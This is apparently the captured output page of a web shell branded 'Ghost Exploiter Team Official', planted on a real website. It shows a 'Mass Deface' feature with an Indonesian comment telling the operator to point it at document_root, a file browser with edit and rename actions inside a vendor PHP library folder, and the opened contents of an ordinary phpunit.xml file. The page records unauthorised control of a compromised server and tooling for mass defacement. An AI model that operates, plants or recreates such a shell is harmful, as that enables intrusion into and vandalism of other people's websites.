webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
aminiwrc
/
listing.aminikamanpower.com
/
vendor
/
sebastian
/
object-reflector
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
src
--
ren
tests
--
ren
.gitignore
0.044KB
edt
ren
.php_cs
2.902KB
edt
ren
.travis.yml
0.439KB
edt
ren
ChangeLog.md
0.881KB
edt
ren
LICENSE
1.51KB
edt
ren
README.md
0.487KB
edt
ren
build.xml
0.775KB
edt
ren
composer.json
0.734KB
edt
ren
phpunit.xml
0.677KB
edt
ren
<?xml version="1.0" encoding="UTF-8"?> <phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="https://schema.phpunit.de/6.0/phpunit.xsd" bootstrap="vendor/autoload.php" forceCoversAnnotation="true" beStrictAboutCoversAnnotation="true" beStrictAboutOutputDuringTests="true" beStrictAboutTodoAnnotatedTests="true" verbose="true"> <testsuite> <directory suffix="Test.php">tests</directory> </testsuite> <filter> <whitelist processUncoveredFilesFromWhitelist="true"> <directory suffix=".php">src</directory> </whitelist> </filter> </phpunit>